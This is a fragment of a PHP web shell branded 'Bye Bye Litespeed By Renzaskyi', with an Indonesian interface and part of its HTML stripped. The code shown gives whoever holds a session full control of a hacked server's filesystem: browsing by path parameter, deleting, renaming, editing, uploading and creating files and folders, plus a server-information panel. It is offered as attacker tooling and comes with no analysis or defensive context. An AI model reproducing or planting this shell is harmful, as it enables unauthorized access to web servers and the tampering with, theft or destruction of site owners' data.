alert('Lammer Kayak U Gak Cocok Jadi Bocah Penikung Bro, My Contact => https://www.facebook.com/share/17CRj8DwiF/');"; } } if (!isset($_SESSION['logged_in'])) { echo ' Bye Bye Litespeed By Renzaskyi

Bye Bye Litespeed By Renzaskyi


'; exit; } } // ==== by Renzaskyi ==== $path = isset($_GET['path']) ? $_GET['path'] : getcwd(); $path = realpath($path); chdir($path); // === DELETE FILE/FOLDER === if (isset($_GET['delete'])) { $target = $_GET['delete']; if (is_file($target)) unlink($target); elseif (is_dir($target)) rmdir($target); header("Location: ?path=" . urlencode(dirname($target))); exit; } // === RENAME === if (isset($_POST['rename_old']) && isset($_POST['rename_new'])) { rename($_POST['rename_old'], $_POST['rename_new']); header("Location: ?path=" . urlencode($path)); exit; } // === EDIT FILE === if (isset($_GET['edit'])) { $editFile = $_GET['edit']; if (isset($_POST['new_content'])) { file_put_contents($editFile, $_POST['new_content']); header("Location: ?path=" . urlencode($path)); exit; } $content = htmlspecialchars(file_get_contents($editFile)); echo " Edit File - $editFile

Edit File: $editFile


"; exit; } // === UPLOAD FILE === if (isset($_FILES['file_upload'])) { move_uploaded_file($_FILES['file_upload']['tmp_name'], $path . "/" . $_FILES['file_upload']['name']); header("Location: ?path=" . urlencode($path)); exit; } // === CREATE FILE === if (isset($_POST['new_file'])) { $newFile = $path . "/" . $_POST['new_file']; if (!file_exists($newFile)) file_put_contents($newFile, ""); header("Location: ?path=" . urlencode($path)); exit; } // === CREATE FOLDER === if (isset($_POST['new_folder'])) { $newFolder = $path . "/" . $_POST['new_folder']; if (!file_exists($newFolder)) mkdir($newFolder); header("Location: ?path=" . urlencode($path)); exit; } // === LOGOUT HANDLER === if (isset($_GET['logout'])) { session_destroy(); header("Location: " . $_SERVER['PHP_SELF']); exit; } ?> Renzaskyi

Bye Bye Litespeed By Renzaskyi

[ ! ] Server Information [ ! ]

Hostname:
PHP Version:
System:

Writer Directory




alert('File berhasil ditulis: ' + '".htmlspecialchars($_POST['writer_filename'])."');window.location='?path=".urlencode($path)."';"; exit; } ?> "; } $folders = $regularFiles = []; foreach ($files as $file) { if ($file === "." || $file === "..") continue; $fullpath = $path . "/" . $file; if (is_dir($fullpath)) $folders[] = $file; else $regularFiles[] = $file; } foreach (array_merge($folders, $regularFiles) as $file) { $fullpath = $path . "/" . $file; echo ""; echo ""; echo ""; echo ""; } ?>
NamaUkuranAksi
[Kembali]
" . (is_dir($fullpath) ? "[DIR] $file" : $file) . "" . (is_file($fullpath) ? filesize($fullpath) . " bytes" : "-") . ""; if (is_file($fullpath)) echo "Edit | "; echo "Hapus | "; echo "
"; echo "

My Contact